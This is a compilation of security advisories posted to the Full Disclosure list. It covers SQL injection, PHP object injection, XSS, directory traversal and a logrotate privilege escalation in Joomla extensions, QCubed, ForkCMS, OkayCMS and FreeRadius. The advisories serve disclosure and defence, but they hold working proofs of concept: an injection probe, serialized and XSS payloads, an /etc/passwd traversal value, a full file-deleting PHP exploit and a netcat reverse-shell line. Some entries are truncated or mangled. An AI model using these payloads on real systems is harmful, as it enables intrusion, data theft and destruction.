[FD] [AIT-SA-20220208-01] SexyPolling SQL Injection
SexyPolling SQL Injection | Identifier: | AIT-SA-20220208-01| | Target: | Sexy Polling ( Joomla Extension) | | Vendor: | 2glux | | Version: | all versions below version 2.1.8 | | CVE: | Not yet | | Accessibility: | Remote | | Severity: | Critical | | Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) | Summary [Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php. Vulnerability Description In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections. In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked: ``` $min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : ''; $max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : ''; ``` These are later used unfiltered by the WHERE clause: ``` $query_toal = "SELECT COUNT(sv.`id_answer`) total_count, MAX(sv.`date`) max_date, MIN(sv.`date`) min_date FROM `#__sexy_votes` sv JOIN `#__sexy_answers` sa ON sa.id_poll = '$polling_id' AND sa.published = '1' WHERE sv.`id_answer` = sa.id"; //if dates are sent, add them to query if ($min_date_sended != '' && $max_date_sended != '') $query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' "; ``` Proof Of Concept == To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe. HTTP-Request: ``` POST /components/com_sexypolling/vote.php HTTP/1.1 Host: joomla-server.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest HTTP_X_REAL_IP: 1.1.1.1 Content-Length: 193 Origin: joomla-server.local Connection: close Referer: joomla-server.local/index.php/component/search/ Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6 polling_id=1_id[]=3=digits_date=2021-12-07'_date=2021-12-14_name=-_code=-_name=-_name=-_period=24=1 ``` The HTTP-Resoonse contains a mysql error: ``` HTTP/1.1 500 Internal Server Error Date: Wed, 15 Dec 2021 10:27:40 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/ Content-Length: 4768 Connection: close Content-Type: application/json Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 00:00:00 AND sv.`date` = 2021-12-14 23:59:59 at line 12 https://fonts.googleapis.com/css?family=Open+Sans; rel="stylesheet" /> ``` Vulnerable Versions All versions below version 2.1.8 Tested Versions = Sexy Polling ( Joomla Extension) 2.1.7 Impact == An unauthenticated attacker could inject and execute SQL commands on the database. Mitigation = Sexy Polling 2.1.8 fixed that issue Vendor Contact Timeline | 2021-12-14 | Unable to find a contact of the vendor | | 2021-12-15 | Contacting Joomla Security Strike Team | | 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. | | 2022-01-01 | Sexy Polling releases 2.1.8 | | 2022-04-08 | Public Disclosure | *We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.* Advisory URL === [https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] [AIT-SA-20210215-04] CVE-2020-24036: ForkCMS PHP Object Injection
ForkCMS PHP Object Injection = | Identifier: | AIT-SA-20210215-04 | | Target: | ForkCMS | | Vendor: | ForkCMS | | Version: | all versions below version 5.8.3 | | CVE: | CVE-2020-24036 | | Accessibility: | Remote | | Severity: | Medium | | Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) | SUMMARY = [ForkCMS is an open source cms written in PHP.](https://www.fork-cms.com/) VULNERABILITY DESCRIPTION PHP object injection in the Ajax-endpoint of the backend in ForkCMS below version 5.8.3 allows authenticated remote user to execute malicious code. The ajax-callbacks for the backend use unserialize without restrictions or any validations. An authenticated user could abuse this to inject malicious PHP-Objects which could lead to remote code execution: ``` getRequest()->request->get('url', ''); $className = $this->getRequest()->request->get('className', ''); $methodName = $this->getRequest()->request->get('methodName', ''); $parameters = $this->getRequest()->request->get('parameters', ''); // cleanup values $parameters = unserialize($parameters); // ← VULNERABLE CODE // fetch generated meta url $url = urldecode($this->get('fork.repository.meta')->generateUrl($url, $className, $methodName, $parameters)); // output $this->output(Response::HTTP_OK, $url); } } ``` PROOF OF CONCEPT = In order to exploit this vulnerability, an attacker has to be authenticated with least privileges. We tested this exploit with “Dashboard” permissions. For demonstration purposes we created a proof of concept exploit that deletes files and directories from the webserver. With more effort an attacker might also find a payload for executing a webshell. There are many gadgets available in the vendor directory for potential payloads. The object-injection code for generating a payload might look as following: ``` 'O:27:"Swift_KeyCache_DiskKeyCache":1:{s:4:"keys";a:1:{s:%d:"%s";a:1:{s:%d:"%s";s:9:"something";}}}' % (len(filepath),filepath,len(deletefile),deletefile) ``` VULNERABLE VERSIONS === All versions including 5.8.1 are affected. TESTED VERSIONS === ForkCMS 5.8.1 (with Debian 10 and PHP 7.3.14-1) IMPACT == An authenticated user with minimal privileges could execute malicious code. MITIGATION == Fork-5.8.3 fixed that issue VENDOR CONTACT TIMELINE | 2020-05-01 | Contacting the vendor | | 2020-06-08 | Vendor replied | | 2020-07-07 | Vendor released an updated version | | 2021-02-15 | Public disclosure | ADVISORY URL [https://www.ait.ac.at/ait-sa-20210215-04-poi-forkcms](https://www.ait.ac.at/ait-sa-20210215-04-poi-forkcms) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [AIT-SA-20210215-03] CVE-2020-24912: QCube Cross-Site-Scripting
QCube Cross-Site-Scripting == | Identifier: | AIT-SA-20210215-03 | | Target: | QCubed Framework | | Vendor: | QCubed | | Version: | all versions including 3.1.1 | | CVE: | CVE-2020-24912 | | Accessibility: | Remote | | Severity: | High | | Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) | SUMMARY === QCubed is a PHP Model-View-Controller Rappid Application Development framework. (https://github.com/qcubed/qcubed) VULNERABILITY DESCRIPTION = A reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. PROOF OF CONCEPT = The XSS occurs because the SQL-output in profile.php is not sanitized properly. Since we are able to tamper the output using a SQL-injection(CVE-2020-24913), we can easily output a common XSS string. We use the following payload(unencoded): ``` a:1:{i:0;a:3:{s:12:"objBacktrace";a:1:{s:4:"args";a:1:{i:0;s:3:"PWN";}}s:8:"strQuery";s:112:"select version(); select convert_from(decode($$PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K$$,$$base64$$),$$utf-8$$)";s:11:"dblTimeInfo";s:1:"1";}} ``` PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K is unencoded: ``` "alert(‘xss’)" ``` VULNERABLE VERSIONS === All versions including 3.1.1 are affected. TESTED VERSIONS === QCubed 3.1.1 IMPACT == An unauthenticated attacker could steal sessions of authenticated users. MITIGATION == A patch was delivered by QCubed that allows to disable the profile-functionality( https://github.com/qcubed/qcubed/pull/1320/files ). VENDOR CONTACT TIMELINE === | 2020-04-19 | Contacting the vendor | | 2020-04-19 | Vendor replied | | 2020-05-01 | Vendor released a patch at Github | | 2021-02-15 | Public disclosure | ADVISORY URL [https://www.ait.ac.at/ait-sa-20210215-03-xss-qcubed](https://www.ait.ac.at/ait-sa-20210215-03-xss-qcubed) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [AIT-SA-20210215-02] CVE-2020-24913: QCubed SQL Injection
QCubed SQL Injection == | Identifier: | AIT-SA-20210215-02 | | Target: | QCubed Framework | | Vendor: | QCubed | | Version: | all versions including 3.1.1 | | CVE: | CVE-2020-24913 | | Accessibility: | Remote | | Severity: | Critical | | Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) | SUMMARY === QCubed is a PHP Model-View-Controller Rappid Application Development framework. (https://github.com/qcubed/qcubed) VULNERABILITY DESCRIPTION = A SQL injection vulnerability in qcubed (all versions including 3.1.1) in profile.php via the strQuery parameter allows an unauthenticated attacker to access the database by injecting SQL code via a crafted POST request. The strQuery parameter of the serialized array in profile.php could lead to a sql-injection. This parameter is used by the PrintExplainStatement which simply concats "EXPLAIN ." with this parameter: public function ExplainStatement($sql) { return $this->Query("EXPLAIN " . $sql); } This query will be executed unfiltered. We were able to write proof-of concept exploit for mysql and postgres. Unfortunately with mysql we were not able to use a stacked-queries-payload and we had to exploit this vulnerability with a timebased approach. VULNERABLE VERSIONS === All versions including 3.1.1 are affected. TESTED VERSIONS === QCubed 3.1.1 IMPACT == An unauthenticated attacker could access the database remotely. In worst case scenarios an attacker might be able to execute code on the remote machine MITIGATION == A patch was delivered by QCubed that allows to disable the profile-functionality( https://github.com/qcubed/qcubed/pull/1320/files ). VENDOR CONTACT TIMELINE === | 2020-04-19 | Contacting the vendor | | 2020-04-19 | Vendor replied | | 2020-05-01 | Vendor released a patch at Github | | 2021-02-15 | Public disclosure | ADVISORY URL [https://www.ait.ac.at/ait-sa-20210215-02-unauthenticated-sql-injection-qcubed](https://www.ait.ac.at/ait-sa-20210215-02-unauthenticated-sql-injection-qcubed) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [AIT-SA-20210215-01] CVE-2020-24914: QCubed PHP Object Injection
QCubed PHP Object Injection === | Identifier: | AIT-SA-20210215-01 | | Target: | QCubed Framework | | Vendor: | QCubed | | Version: | all versions including 3.1.1 | | CVE: | CVE-2020-24914 | | Accessibility: | Remote | | Severity: | Critical | | Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) | SUMMARY === QCubed is a PHP Model-View-Controller Rappid Application Development framework. (https://github.com/qcubed/qcubed) VULNERABILITY DESCRIPTION = A PHP object injection bug in profile.php in qcubed (all versions including 3.1.1) unserializes the untrusted data of the POST-variable "strProfileData" and allows an unauthenticated attacker to execute code via a crafted POST request. qcubed/assets/php/profile.php: https://www.ait.ac.at/ait-sa-20210215-01-unauthenticated-remote-code-execution-qcubed](https://www.ait.ac.at/ait-sa-20210215-01-unauthenticated-remote-code-execution-qcubed) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [AIT-SA-20200301-01] CVE-2020-9364: Directory Traversal in Creative Contact Form
# Directory Traversal in Creative Contact Form ## Overview * Identifier: AIT-SA-20200301-01 * Target: Creative Contact Form (for Joomla) * Vendor: Creative Solutions * Version: 4.6.2 (before Dec 03 2019) * CVE: CVE-2020-9364 * Accessibility: Remote * Severity: Critical * Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology) ## Summary [Creative Contact Form](https://creative-solutions.net/) is a responsive jQuery contact form for the Joomla content-management-system. ## Vulnerability Description A directory traversal vulnerability resides inside the mailer component of the Creative Contact Form for Joomla. An attacker could exploit this vulnerability to receive any files from the server via e-mail. The vulnerable code is located in "helpers/mailer.php" at line 290: ``` if(isset($_POST['creativecontactform_upload'])) { if(is_array($_POST['creativecontactform_upload'])) { foreach($_POST['creativecontactform_upload'] as $file) { // echo $file.'--'; $file_path = JPATH_BASE . '/components/com_creativecontactform/views/creativeupload/files/'.$file; $attach_files[] = $file_path; } } } ``` If an attacker puts "../../../../../../../../etc/passwd" into $_POST['creativecontactform_upload'], and enables "Send me a copy", the contact-form would send him the content of /etc/passwd via email. _Note: this vulnerability might not be exploitable in the free version of Creative Contact Form since it does not allow "Send copy to sender"._ ## Vulnerable Versions Creative Contact Form Personal/Professional/Business 4.6.2 (before Dec 3 2019) ## Impact An unauthenticated attacker could receive any file from the server ## Mitigation Update to the current version ## References: * https://nvd.nist.gov/vuln/detail/CVE-2020-9364 ## Vendor Contact Timeline * `2019-12-02` Contacting the vendor * `2019-12-02` Vendor published a fixed version * `2019-03-01` Public disclosure ## Advisory URL [https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form](https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [AIT-SA-20191129-01] CVE-2019-16885: Unauthenticated remote code execution in OkayCMS
# Unauthenticated remote code execution in OkayCMS ## Overview * Identifier: AIT-SA-20191129-01 * Target: OkayCMS * Vendor: OkayCMS * Version: all versions including 2.3.4 * CVE: CVE-2019-16885 * Accessibility: Local * Severity: Critical * Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology) ## Summary [OkayCMS is a simple and functional content managment system for an online store.](https://okay-cms.com) ## Vulnerability Description An unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This could happen at two places. First in "view/ProductsView.php" using the cookie "price_filter" or in "api/Comparison.php" via the cookie "comparison". Both cookies will pass untrusted values to a unserialize()-function. The following code shows the vulnerability in "api/Comparison.php": ``` $items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array(); ``` The unsafe deserialization also occurs in "view/ProductsView.php": ``` $price_filter = unserialize($_COOKIE['price_filter']); ``` ## Proof of Concept The following code utilizes an object of the smarty-component to delete arbitrary files from the webhost: ``` \n"; exit(1); } $url = $argv[1]; $file = $argv[2]; class Smarty_Internal_CacheResource_File { public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) { $cached->is_locked = false; @unlink($cached->lock_id); } } class Smarty_Template_Cached { public $handler = null; public $is_locked = true; public $lock_id = ""; public function __construct() { $this->lock_id = $GLOBALS['file']; $this->handler = new Smarty_Internal_CacheResource_File; } } class Smarty { public $cache_locking = true; } class Smarty_Internal_Template { public $smarty = null; public $cached = null; public function __construct() { $this->smarty = new Smarty; $this->cached = new Smarty_Template_Cached; } public function __destruct(){ if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) { $this->cached->handler->releaseLock($this->smarty, $this->cached); } } } $obj = new Smarty_Internal_Template(); $serialized = serialize($obj); $un = unserialize($serialized); $headers = [ 'Accept-Language: en-US,en;q=0.5', "Referer: $url/en/catalog/myagkie-igrushki", 'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';' ]; $curl = curl_init(); curl_setopt_array($curl, [ CURLOPT_HTTPHEADER => $headers, CURLOPT_RETURNTRANSFER => true, CURLOPT_URL => "$url/en/catalog/myagkie-igrushki/sort-price", CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0' ]); $resp = curl_exec($curl); if(curl_error($curl)) { print curl_error($curl); } curl_close($curl); print $resp; ?> ``` ## Notes Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution. ## Vulnerable Versions versions of the “Lite”-branch including 2.3.4. Pro Versions prior 3.0.2 might have been affected too. ## Tested Versions OkayCMS-Lite 2.3.4 ## Impact An unauthenticated attacker could upload a webshell to the server and execute commands remotely. ## Mitigation At the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended. ## References: * https://nvd.nist.gov/vuln/detail/CVE-2019-16885 ## Vendor Contact Timeline * `2019-08-29` Contacting the vendor * `2019-09-04` Vendor replied * `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix * `2019-09-29` Public disclosure ## Advisory URL [https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [AIT-SA-20191112-01] CVE-2019-10143: Privilege Escalation via Logrotate in FreeRadius
# Privilege Escalation via Logrotate in FreeRadius ## Overview Identifier: AIT-SA-20191112-01 Target: FreeRadius Vendor: FreeRadius Version: all versions including 3.0.19 Fixed in Version: 12.2.3, 12.1.8 and 12.0.8 CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-10143 Accessibility: Local Severity: Low Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology) ## Summary [FreeRadius is a modular Open-Source RADIUS suite.](https://freeradius.org/) ## Vulnerability Description The ownership of the logdirectory "radacct" belongs to user "radiusd". User "radiusd" can elevate the privileges to "root" because of an unsafe interaction with logrotate. User "radiusd" owns the log directory /var/log/radius/radacct: ``` drwx--. 3 radiusd radiusd 4096 26. Apr 16:01 /var/log/radius/radacct/ ``` Log files rotate once a day(or any other frequency if configured) by logrotate as user root. The configuration does not use the "su" directive: ``` /var/log/radius/radacct/*/detail { monthly rotate 4 nocreate missingok compress } ``` Since logrotate is prone to a race-condition(see https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition) it is possible for user "radiusd" to replace the directory /var/log/radius/radacct/logdir with a symbolic link to any directory(for example /etc/bash_completion.d). logrotate will place the compressed files AS ROOT into /etc/bash_completition.d and set the owner and group to "radiusd.radiusd". An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse shell will be executed then. Details of the race-condition in logrotate can be found at: * https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition * https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges * https://github.com/whotwagner/logrotten ## Proof of Concept The following example illustrates how an attacker who already gained a shell as user "radiusd", can elevate his privileges to "root". After downloading and compiling, the exploit gets executed and waits until the next daily run of logrotate. If the rotation of the log file succeeds, a new file that contains the reverse shell payload, will be written into /etc/bash_completition.d/ with owner "radiusd". As soon as root logs in, the reverse shell gets executed and opens a shell on the attackers netcat listener: ``` radiusd@redhat7:~$ git clone https://github.com/whotwagner/logrotten.git /tmp/logrotten Cloning into '/tmp/logrotten'... remote: Enumerating objects: 84, done. remote: Counting objects: 100% (84/84), done. remote: Compressing objects: 100% (58/58), done. remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0 Unpacking objects: 100% (84/84), done. radiusd@redhat7:~$ mkdir -p /var/log/radius/radacct/logdir radiusd@redhat7:~$ touch /var/log/radius/radacct/logdir/detail radiusd@redhat7:~$ cd /tmp/logrotten && gcc -o logrotten logrotten.c radiusd@redhat7:/tmp/logrotten$ ./logrotten -c /var/log/radius/radacct/logdir/detail Waiting for rotating /var/log/radius/radacct/logdir/detail... Renamed /var/log/radius/radacct/logdir/detail with /var/log/radius/radacct/logdir/detail2 and created symlink to /etc/bash_completion.d Done! radiusd@redhat7:/tmp/logrotten$ ls -l /etc/bash_completion.d/ total 20 -rw-r--r-- 1 root root 11144 Oct 28 2018 grub -rw-r--r-- 1 radiusd radiusd 33 May 12 18:44 detail.1.gz radiusd@redhat7:/tmp/logrotten$ echo "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash localhost &); fi" > /etc/bash_completion.d/detail.1.gz radiusd@redhat7:/tmp/logrotten$ nc -nvlp listening on [any] ... connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526 id uid=0(root) gid=0(root) groups=0(root) ``` ## Vulnerable Versions All versions including 3.0.19 ## Tested Versions Name : freeradius Architecture: x86_64 Version: 3.0.13 Release: 9.el7_5 ## Impact An attacker who already achieved a valid shell as user "radiusd" could elevate the privileges to "root". The fact that another exploit is needed to get a shell lowers the severity from high to low. ## Mitigation Add "su radiusd:radiusd" to all log sections in /etc/logrotate.d/radiusd. By keeping SELinux in "Enforcing" mode, the "radiusd" user will be limited in the directories he can write to. ## References: * https://access.redhat.com/security/cve/cve-2019-10143 * https://nvd.nist.gov/vuln/detail/CVE-2019-10143 ## Vendor Contact Timeline * `2019-05-01` Contacting RedHat * `2019-05-07` RedHat opens issue at the vendor bugtracker * `2019-05-23` CVE gets assigned to the issue * `2019-05-24` FreeRadius is skeptical about the "security" impact * `2019-11-12` Public disclosure ## Notes This CVE is disputed because the vendor [stated that there is no known remote code execution in freeradius that allows an attacker to gain a shell as user "radiusd"]( https://freeradius.org/security/). CVE's are